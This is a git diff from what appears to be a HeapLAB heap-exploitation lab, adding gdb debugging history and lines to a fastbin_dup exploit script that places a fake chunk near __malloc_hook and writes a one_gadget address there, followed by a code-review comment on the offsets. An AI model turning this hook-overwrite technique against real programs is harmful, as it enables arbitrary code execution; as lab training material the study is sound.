Diffstat (limited to 'HeapLAB')
-rw-r--r--HeapLAB/challenge-fastbin_dup/.gdb_history130
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/bruh.py7
2 files changed, 71 insertions, 66 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
index 4933f78..7bd5bb8 100644
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -1,68 +1,3 @@
-c
-x 0x7f4854db6b40
-c
-x 0x7f4854db6b40
-x main_arena
-x &main_arena
-x &__malloc_hook
-x main_arena.top
-db main_arena.top
-c
-c
-c
-q
-print __malloc_hook
-print __malloc_hook
-fastbins
-c
-fastbins
-c
-vis_heap_chunks
-c
-fastbins
-r
-c
-fastbins
-print main_arena
-vis_heap
-c
-fastbins
-fastbins
-c
-fastbins
-r
-c
- quit
-db main_arena
-db &main_arena.fastbinsY
-q
-r
-c
-c
-fastbins
-print &main_arena
-print main_arena
-c
-print main_arena
-db main_arena
-db &main_arena
-db &main_arena/100
-db &main_arena 100
-db &main_arena 1000
-q
-db main_arena.bins
-db &main_arena.fastbinsY
-run
-c
-c
-q
-r
-c
-fastbins
-c
-fastbins
-c
-fastbins
r
c
c
@@ -254,3 +189,68 @@ db 0x7f265fd4cb2d-1
db
c
db &__malloc_hook-(16) (16*8)
+exit
+quit
+x rsp
+print $rsp+50
+print $rsp
+print $*rsp
+print $rsp
+print (void*)$rsp
+print (void*)$rsp+50
+print (void*)*$rsp+50
+print (void*)&$rsp+50
+x 0x7ffc1644e71a
+print (void*)&$rsp+50
+print (void*)$rsp+50
+print (void*)$rsp+0x50
+x 0x7ffc1644e738
+quit
+q
+print main_arena
+find_fake_fast &__malloc_hook
+q
+quit
+fastbins
+find_fake_fast &__malloc_hook
+print (void*)&__malloc_hook
+q
+x &__malloc_hook
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (17*8)
+db &__malloc_hook-(16) (18*8)
+db &__malloc_hook-(16) (19*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+find_fake_fast &__malloc_hook
+db 0x7fd4a6cf7b2d-(16) (20*8)
+q
+print main_arena
+vis_heap_chunks
+db 0x7f37a78ddb7d-(16) (20*8)
+db 0x7f37a78ddb7d-(32) (20*8)
+quit
+db 0x7f37a78ddb7d-(32) (20*8)
+db main_arena.top-(32) (20*8)
+search 0x7f323f6f0fa1
+search 0x7f323f6f0fa1
+search --help
+search --qword 0x7f323f6f0fa1
+search -p 0x7f323f6f0fa1
+search -p 0x0fa1
+search -p 0xa10f
+search -hexp 0x7f323f6f0fa1
+search --hex 0x7f323f6f0fa1
+search --hex 7f323f6f0fa1
+search --hex -8 7f323f6f0fa1
+search -8 --hex 7f323f6f0fa1
+search -t qword --hex 7f323f6f0fa1
+search -t qword -x 7f323f6f0fa1
+search -t qword -x 0x7f323f6f0fa1
+search -t qword 0x7f323f6f0fa1
+quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 56b0c71..df54957 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -74,9 +74,14 @@ malloc(119, 'sdfg')
#8 * 9
-payload_loc = libc.sym.__malloc_hook - 35
+payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
malloc(119, p64(0)*9 + p64(payload_loc))
+#we now have things in place and shit
+onegadget = libc.address + 0xe1fa1
+malloc(72, p64(0)*(35) + p64(onegadget))
+
+print("onegadget: {}".format(hex(onegadget)))
print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================
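Review bot: The padding on the new `malloc(72, p64(0)*(35) + p64(onegadget))` line does not match the fake-chunk position set up two lines earlier: `payload_loc` is `__malloc_hook - 35`, and if that allocation hands back the fake chunk at `payload_loc`, its user data starts 16 bytes in, leaving 19 bytes (not 35 qwords, i.e. 280 bytes) before `__malloc_hook`, so the gadget pointer would land well past the hook unless the helper truncates the write — confirm the offset in gdb (`db &__malloc_hook-(16) (20*8)`, as in the history) before relying on it. The new `onegadget = libc.address + 0xe1fa1` is a build-specific offset recorded with neither the libc it belongs to nor the stack/register constraint it needs; note both next to it, e.g. `# one_gadget offset for the bundled libc (re-run one_gadget if the target changes); constraint checked in gdb around $rsp+0x50 per history`. The `#definetly the right thing` comment on the `payload_loc` line should state what was verified instead, e.g. `# fake fastbin chunk reported by find_fake_fast: 0x7f size byte sits at __malloc_hook-35`, since it tells a later reader nothing. The surrounding script section appears to continue past the shown context.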